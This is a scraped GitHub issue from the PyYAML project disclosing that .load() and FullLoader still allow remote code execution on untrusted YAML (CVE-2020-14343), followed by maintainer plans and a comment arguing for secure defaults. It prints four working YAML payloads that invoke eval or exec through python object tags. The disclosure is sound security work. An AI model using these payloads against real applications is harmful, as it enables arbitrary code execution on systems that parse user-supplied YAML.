.load() and FullLoader still vulnerable to fairly trivial RCE
See original GitHub issueAs of 5.3.1 .load() defaults to using FullLoader and FullLoader is still vulnerable to RCE when run on untrusted input. As demonstrated by the examples below, #386 was not enough to fix this issue.
Some example payloads:
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- [ "RCE_HERE" ]
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "RCE_HERE"
- !!python/object/new:str
args: []
state: !!python/tuple
- "RCE_HERE"
- !!python/object/new:staticmethod
args: [0]
state:
update: !!python/name:exec
I do not believe this is entirely fixable unless PyYAML decides to use secure defaults, and make .load() equivalent to .safe_load() ( #5 )
FullLoader should probably be removed, as I don’t see the purpose of it.
Issue Analytics
- State:
- Created 3 years ago
- Reactions:12
- Comments:44 (30 by maintainers)
Top Results From Across the Web
CVE-2020-14343 | Vulnerability Database - Debricked
A vulnerability was discovered in the PyYAML library in versions before 5.4, wh. ... .load() and FullLoader still vulnerable to fairly trivial RCE...
Read more >Debian Bug report logs - #966233 pyyaml: CVE-2020-14343
CVE-2020-14343[0 ]: | .load() and FullLoader still vulnerable to fairly trivial RCE The CVE is for an incomplete fix of CVE-2020-1747, ...
Read more >Bug#966233: pyyaml: CVE-2020-14343
The following vulnerability was published for pyyaml. CVE-2020-14343[0]: | .load() and FullLoader still vulnerable to fairly trivial RCE
Read more >Bug#966233: marked as done (pyyaml: CVE-2020-14343)
CVE-2020-14343[0 ]: | .load() and FullLoader still vulnerable to fairly trivial RCE The CVE is for an incomplete fix of CVE-2020-1747, see [1]....
Read more >CVE-2020-14343 - Twitter Search / Twitter
Another exercise: CVE-2020-14343 on a RCE via PyYAML: ... .load() and FullLoader still vulnerable to fairly trivial RCE · Issue #420 · yaml/pyyaml....
Read more >Top Related Medium Post
No results found
Top Related StackOverflow Question
No results found
Troubleshoot Live Code
Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start FreeTop Related Reddit Thread
No results found
Top Related Hackernoon Post
No results found
Top Related Tweet
No results found
Top Related Dev.to Post
No results found
Top Related Hashnode Post
No results found
Top GitHub Comments
https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation has been updated.
Moving forward:
5.4:
load
remains FullLoader6.0:
load
will be switched to SafeLoaderload
usage will be madeThis is the rough plan. I’ll start working on the 5.4 release this week. See https://github.com/yaml/pyyaml/projects/5
Comments welcome.
@ingydotnet it’s still possible to get arbitrary code execution with only
!!python/object/new
, BTWUltimately, it’s your choice what you decide to do with the library, but let me state my opinions.
I definitely have seen projects in the wild that are loading YAML via
yaml.load()
from untrusted sources. I can’t disclose specific names but one example is a web portal that allowed users to upload YAML config files, and then loaded them. Given some time, I could probably find several on GitHub if you would like.Developers tend to be lazy, no one wants to read the docs. This is why it’s important to follow the principle of having secure defaults. It’s important for a library to attempt to protect its users (even if they dont read :p)
Here’s a quote from the ReactJS (popular facebook-made frontend library) documentation which explains their reasoning for their function
dangerouslySetInnerHTML
. I wholeheartedly agree with them.My observations are that the mental model that many developers have of YAML is that it’s a simple data interchange format exactly like JSON. Not a complex serialization language. In the same way they don’t expect
json.load()
to lead to code execution, they don’t expectyaml.load()
to lead to code execution.I also believe that it is okay to break backwards compatibility in favor of security. How many people are really relying on PyYAML’s ability to serialize complex objects? I don’t have too much insight into this, but my thoughts are – not many.
From some quick Github code search results that I did, there are ~762k files that use PyYAML. Of those, up to 529k files are currently using the default FullLoader as the loading mechanism, which is vulnerable to arbitrary code execution. 220k call safe_load or specify SafeLoader, and only 13k explicitly use unsafe_load or specify UnsafeLoader.